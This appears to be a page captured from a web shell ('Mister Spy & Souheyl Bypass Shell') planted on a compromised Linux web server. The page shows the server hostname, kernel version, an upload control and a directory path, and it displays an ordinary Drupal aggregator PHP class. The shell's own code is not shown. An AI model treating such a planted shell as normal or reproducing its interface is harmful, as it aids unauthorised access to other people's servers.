Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html_old/12park.004/web/core/modules/aggregator/src/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html_old/12park.004/web/core/modules/aggregator/src/AggregatorFeedViewsData.php

<?php

namespace Drupal\aggregator;

use Drupal\views\EntityViewsData;

/**
 * Provides the views data for the aggregator feed entity type.
 */
class AggregatorFeedViewsData extends EntityViewsData {

  /**
   * {@inheritdoc}
   */
  public function getViewsData() {
    $data = parent::getViewsData();

    $data['aggregator_feed']['table']['join'] = [
      'aggregator_item' => [
        'left_field' => 'fid',
        'field' => 'fid',
      ],
    ];

    $data['aggregator_feed']['fid']['help'] = $this->t('The unique ID of the aggregator feed.');
    $data['aggregator_feed']['fid']['argument']['id'] = 'aggregator_fid';
    $data['aggregator_feed']['fid']['argument']['name field'] = 'title';
    $data['aggregator_feed']['fid']['argument']['numeric'] = TRUE;

    $data['aggregator_feed']['fid']['filter']['id'] = 'numeric';

    $data['aggregator_feed']['title']['help'] = $this->t('The title of the aggregator feed.');
    $data['aggregator_feed']['title']['field']['default_formatter'] = 'aggregator_title';

    $data['aggregator_feed']['argument']['id'] = 'string';

    $data['aggregator_feed']['url']['help'] = $this->t('The fully-qualified URL of the feed.');

    $data['aggregator_feed']['link']['help'] = $this->t('The link to the source URL of the feed.');

    $data['aggregator_feed']['checked']['help'] = $this->t('The date the feed was last checked for new content.');

    $data['aggregator_feed']['description']['help'] = $this->t('The description of the aggregator feed.');
    $data['aggregator_feed']['description']['field']['click sortable'] = FALSE;

    $data['aggregator_feed']['modified']['help'] = $this->t('The date of the most recent new content on the feed.');

    return $data;
  }

}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net